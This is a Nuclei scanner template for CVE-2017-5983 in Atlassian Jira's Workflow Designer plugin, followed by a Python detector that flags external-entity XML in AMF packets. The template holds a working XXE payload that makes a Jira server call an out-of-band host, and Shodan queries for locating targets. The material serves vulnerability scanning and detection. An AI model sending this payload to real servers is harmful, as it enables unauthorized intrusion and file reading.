The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
PoC code [publicly available]
id: CVE-2017-5983

info:
  name: JIRA Workflow Designer Plugin in Atlassian JIRA Server > 6.3.0 - Remote Code Execution (XXE)
  author: us3r777,Synacktiv
  severity: critical
  description: |
    The JIRA Workflow Designer Plugin in Atlassian JIRA Server before 6.3.0 improperly uses an XML parser and deserializer, which allows remote attackers to execute arbitrary code, read arbitrary files, or cause a denial of service via a crafted serialized Java object.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5983
    - https://code-white.com/blog/2017-04-amf/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-5983
    cwe-id: CWE-502
    epss-score: 0.08385
    epss-percentile: 0.91979
    cpe: cpe:2.3:a:atlassian:jira:4.2.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.title:"system dashboard - jira"
      - cpe:"cpe:2.3:a:atlassian:jira"
      - http.component:"atlassian confluence"
      - http.component:"atlassian jira"
  tags: cve,cve2017,jira,amf,rce,xxe,vuln

variables:
  version: "\x00\x00"
  header_count: "\x00\x00"
  message_count: "\x00\x01"
  target_uri: "test"
  target_uri_len: "\x00\x04"
  response_uri: "test"
  response_uri_len: "\x00\x04"
  xml_marker: "\x0f"
  xxe_payload: '<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://{{interactsh-url}}/amf"> %ext; ]>'
  int: "0000"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/secure/Dashboard.jspa"
      - "{{BaseURL}}/jira/secure/Dashboard.jspa"
      - "{{BaseURL}}/login.jsp"

    stop-at-first-match: true
    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'title="JiraVersion"'
        internal: true

  - raw:
      - |
        POST /plugins/servlet/jwd/amf/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        Content-Length: {{len(xxe_payload)+29}}

        {{version}}{{header_count}}{{message_count}}{{target_uri_len}}{{target_uri}}{{response_uri_len}}{{response_uri}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(int,xml_marker,xxe_payload)))))}}{{xml_marker}}{{url_decode(concat("%00%00%00%",dec_to_hex(len(concat(xxe_payload)))))}}{{xxe_payload}}

    unsafe: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 490a0046304402207e9e69e65e82b53f4a8a2aa88cbf94af08fe11431be6829a687e86f7d7f6a1270220155f064239e741d1799a609780e29130179919a5b277ed3ffb248fd430467c59:922c64590222798bb761d5b6d8e72950
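As an added defender-side example (not part of the template or of the Atlassian or nuclei projects), the following Python walks an AMF0 packet laid out the way the raw request above builds it (version, header count, message count, target and response URI, then an xml-document body: marker 0x0f, U32 length, XML) and flags any XML body whose DTD declares an external entity, which is what a request-log inspector or WAF rule in front of /plugins/servlet/jwd/amf/ would look for. The sample messages and the collaborator.invalid host are constructed placeholders; it also rejects truncated packets instead of silently skipping them.

```python
import re
import struct

AMF_XML_MARKER = 0x0F  # AMF0 xml-document type marker (the template's xml_marker byte)
# <!ENTITY name SYSTEM/PUBLIC ...> or parameter entity <!ENTITY % name SYSTEM ...>
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b", re.I)

# Constructed samples (not captured traffic): the page's payload shape with a
# placeholder host, and a benign document whose DTD declares only an internal entity.
XXE_XML = b'<?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://collaborator.invalid/amf"> %ext; ]>'
BENIGN_XML = b'<!DOCTYPE message [ <!ENTITY greeting "hi"> ]><message>&greeting;</message>'


def build_amf_xml_packet(xml: bytes, target=b"test", response=b"test") -> bytes:
    """Lay out one AMF0 message as the template does: version, header count, message
    count, target URI, response URI, then a body = xml-document (0x0f, U32 length, XML)."""
    body = bytes([AMF_XML_MARKER]) + struct.pack(">I", len(xml)) + xml
    pkt = struct.pack(">HHH", 0, 0, 1)  # version 0, no headers, one message
    pkt += struct.pack(">H", len(target)) + target
    pkt += struct.pack(">H", len(response)) + response
    return pkt + struct.pack(">I", len(body)) + body


def iter_amf_bodies(data: bytes):
    """Yield each message body of an AMF0 packet; raise ValueError if it is truncated."""
    try:
        _version, header_count, message_count = struct.unpack_from(">HHH", data, 0)
        off = 6
        for _ in range(header_count):  # header: U16 name, U8 must-understand, U32 length, data
            nlen = struct.unpack_from(">H", data, off)[0]
            hlen = struct.unpack_from(">I", data, off + 3 + nlen)[0]
            off += 7 + nlen + hlen
        for _ in range(message_count):
            for _ in range(2):  # target URI, then response URI: U16 length + bytes
                off += 2 + struct.unpack_from(">H", data, off)[0]
            blen = struct.unpack_from(">I", data, off)[0]
            if off + 4 + blen > len(data):
                raise ValueError("AMF message body truncated")
            yield data[off + 4:off + 4 + blen]
            off += 4 + blen
    except struct.error as exc:
        raise ValueError("AMF packet truncated") from exc


def external_dtd_bodies(data: bytes) -> list:
    """Return the XML of every xml-document message whose DTD references an external entity."""
    hits = []
    for body in iter_amf_bodies(data):
        if len(body) >= 5 and body[0] == AMF_XML_MARKER:
            xml = body[5:5 + struct.unpack_from(">I", body, 1)[0]]
            if EXTERNAL_ENTITY_RE.search(xml):
                hits.append(xml)
    return hits
```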